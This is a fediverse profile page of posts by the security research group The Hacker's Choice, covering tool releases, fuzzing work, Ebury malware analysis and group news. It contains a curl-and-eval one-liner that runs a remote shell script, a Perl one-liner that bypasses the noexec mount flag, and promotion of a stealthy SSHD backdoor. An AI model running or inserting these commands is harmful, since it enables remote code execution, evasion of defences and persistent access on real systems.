Elektrine
EN
Log in Register
Paige Chat Timeline Communities Gallery Videos Email DNS VPN Uptime Kairo
Back to Timeline
Remote

The Hacker‘s Choice

@thc@infosec.exchange
  • Open on infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

0 Followers
0 Following
27 Posts
Joined November 05, 2022
github:
https://github.com/hackerschoice/
github:
https://github.com/vanhauser-thc/

Posts

Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Apr 09, 2026
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @thc@infosec.exchange
@smokes.thc.org 👀
3
1
2
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Apr 09, 2026
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

🤘 THC-RELEASE 🤘: Anonymous EMAIL FORWARDS. No Logz. No Limitz. FREE ✅

Grab your @reads.phrack.org or @segfault.net - and more.

👉https://mail.thc.org👈

Built by the legendary extencil

25
2
22
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Mar 02, 2026
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

❤️RELEASE: The TEAM-TESO cvs:

https://thc.org/team-teso/

Exploits, advisories, teso-informational (never released), burneye ELF crypter, bscan mass scanner, …plus some rare pictures.

Which 7350 exploit was your favourite?

Enjoy & Keep hacking,

Yours Sincerely,
Team-Teso (via THC’s bsky account).

28
0
14
1
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 16, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @usbee@infosec.exchange
@usbee trough your donations ❤️
2
1
0
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 16, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @elithebearded@fed.qaz.red
@elithebearded Yes. Wildcards may help to hide them a bit longer. We find sub domains by various methods. CT stream is one but also searching other places…or user feedback:
2
1
0
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 16, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @fwaggle@moodoo.org
@fwaggle on my Ubuntu 22.0 and 24.0 the ed25519 host public key is not in PEM but in the format (no section). What distro uses PEM? I can try to convert it to the type-format and see if the daemon blindly accepts it.
0
1
1
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 16, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @freddy@social.security.plumbing
@freddy it’s sourced by many methods, CT stream is one of the big data inputs (but also where most of the rubbish comes from - which we try to filter out before adding to the database).
1
0
0
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 16, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

THC Release 💥: The world’s largest IP<>Domain database: https://ip.thc.org

All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.

Updated monthly.

Try: curl https://ip.thc.org/1.1.1.1

Raw data: https://ip.thc.org/docs/bulk-data-access

(The fine work of messede 👌)

What does everyone think? Need feedback before release tomorrow :)

176
17
122
3
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 14, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @lp0_on_fire@social.linux.pizza
@lp0_on_fire it will work fine without systemctl. Any way to restart the sshd will work. either by waiting for a reboot or send a SIGTERM.
0
0
0
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 13, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @agowa338@chaos.social
@agowa338 Can't see how rhost is better. rhosts-trick requires the attacker to drop at least 2 new files to the target and change at least 1 line in the sshd_config (HostbasedAuthentication; a line that raises a red flag). Our trick adds no new file to the system and only needs 1 line to the config (without raising a red flag). Please explain if I got this wrong.
2
0
0
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 13, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

Can anyone test my *SMALLEST* SSHD backdoor?

- Survives updates.
- Does not use ~/.ssh/authorized_keys or PAM modules.
- Does not create any new file.

Just SSHD trickery.

Source at https://thc.org/tips

77
5
43
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 02, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷

More: https://thc.org/404

we had joy we had fun we had a rootshell on a sun.

54
3
44
2
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Nov 21, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @thc@infosec.exchange
Ebury Version 1.8.2.e6 Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.
6
0
5
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Nov 21, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @thc@infosec.exchange
{eval,"$({curl,-SsfL,https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh})"} ### hackshell now detects Ebury ###
3
0
1
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Nov 21, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

EBury SSHD backdoor?? on 400,000 hosts?

Let's fuck around and find out. (Why +s on the .so file???)

Dissect, understand & ridicule. Join the group effort at https://thc.org/ops or SSH straight into the server and check ~/ebury:

ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault')

21
3
15
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 12, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

INTERVIEW of "MB" WhereWarlocksStayUpLate:

https://wherewarlocksstayuplate.com/interview/mohammed-bagha/

You have inspired many. We are fans:⚡️🌊🎠

https://wherewarlocksstayuplate.com/interview/mohammed-bagha/

7
0
4
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 08, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

🇩🇪 German speaking only: THC member and @phrack@haunted.computer staff on @heiseonline@social.heise.de about Phrack's 40th, hacking and life in general.

8
0
6
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 08, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:

https://c-skills.blogspot.com

18
0
11
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Sep 23, 2025
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

Friend of ours is testing his PoC to DISABLE XMR mining pools.

Revenge for all those pesty XMR miners installed by script kiddies. Tool destroys the ENTIRE wallet: stopping all xmr-rig miners worldwide (of the same wallet).

Looking for more WALLETs: https://wallet.hellknight.xyz/walletinfo1.php

Please help and save a baby seal.

36
2
18
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Dec 18, 2024
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

ℙḨƦĀℂ𝐊 wants you 🫵 to be an AUTHOR 📜. 40th Anniversary Edition #72 🎂 👉👉👉deadline APRIL-2025. Write now. ‼️Become IMMORTAL 🦸‼️

https://phrack.org

6
0
5
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 30, 2024
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @patpro@mastodon.green
@patpro@mastodon.green what do you get on your first if you do: cat /sys/class/dmi/id/product_name /sys/class/dmi/id/sys_vendor /sys/class/dmi/id/board_vendor /sys/class/dmi/id/bios_vendor /sys/class/dmi/id/product_version ? Is there a system where /sys/* is restricted but lspci | vga is allowed?
0
2
0
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 30, 2024
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange
Replying to @patpro@mastodon.green
@patpro@mastodon.green agreed. Do you know why they check for “vga” and “aes”? To what gain? It does less than our very own WhatServer (https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/whatserver.sh) but I may steal the awk-netstat :)
0
2
0
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 30, 2024
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

💙💙BlueTeam today (#awkward)💙💙 Auto-exfil of system essentials via ssh. 👉Any guess👈 Ebury? Mining-kiddos? Here at THC we appreciate compact shell-based exfil-tools : #livingofftheland
(Source here: https://cryptpad.disroot.org/code/#/2/code/view/WTjS+8u6DUEipuuiDlIPZPHULGDVDnz7o-p3P5G40LM/)

4
2
4
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Sep 04, 2024
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

Any PERL GURU to golf this smaller? A 1-liner to circumvent 'noexec' mount flag on Linux and load any binary directly into memory (example uses /usr/bin/id):

cat /usr/bin/id | perl -e '$f=syscall(319,$n="",1);if(-1==$f){$f=syscall(279,$n,1);}open($o,">&=".$f);while(){print $o $_;};exec {"/proc/$$/fd/$f"} x'

(from https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#memexec)

17
5
13
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Feb 06, 2024
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

Only once about every two years I do a public training (most are in-house for companies). So a rare chance to get in-depth knowledge on fuzzing: 24-27 June in Montreal at the recon conference: https://recon.cx/2024/trainingMasteringAdvancedFuzzTestingTechniquesonUNIX.html @recon@infosec.exchange #fuzzing

8
0
8
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 21, 2023
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

Updated the article at https://www.srlabs.de/blog-post/advanced-fuzzing-unmasks-elusive-vulnerabilities because I accidentally added a partial corrupted seed in the middle of the campaign that made it easier for the fuzzer to find the bug. Sorry I fucked that up! Luckily I released my corpus otherwise this error would not have been discovered. Imho it is important to be transparent about results so they can be independently verified as well as to be truthful if you made a mistake :)

8
0
3
0
Open post
thc
The Hacker‘s Choice @thc@infosec.exchange · Oct 16, 2023
The Hacker‘s Choice
@thc@infosec.exchange

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

infosec.exchange

The blog post about the libwebp vulnerability fuzzing is up, it explains how I set up the experiment, how the crash was found and why oss-fuzz was not able to find it: https://www.srlabs.de/blog-post/advanced-fuzzing-unmasks-elusive-vulnerabilities #fuzzing

29
0
27
0

Remote instance

infosec.exchange
Open on original server

Media

313k7r1n3
Elektrine

Tor hidden service

elekhj7afj4qnrr4yd3bkzslsyo5jgfxw3orgjkhlcxifueodybyiiad.onion

Platform

  • Email
  • Chat
  • Timeline
  • Communities
  • VPN
  • DNS

Company

  • About
  • Contact
  • FAQ

Legal

  • Terms of Service
  • Privacy Policy
  • Warrant Canary
  • Lite (no JS)
  • VPN Policy
  • Source code

Support

  • support@elektrine.com
  • Report Security Issue
Mail client setup IMAP mail.elektrine.com:993 POP3 mail.elektrine.com:995 SMTP mail.elektrine.com:465
© 2026 Elektrine. All rights reserved. Server: 23:35:09 UTC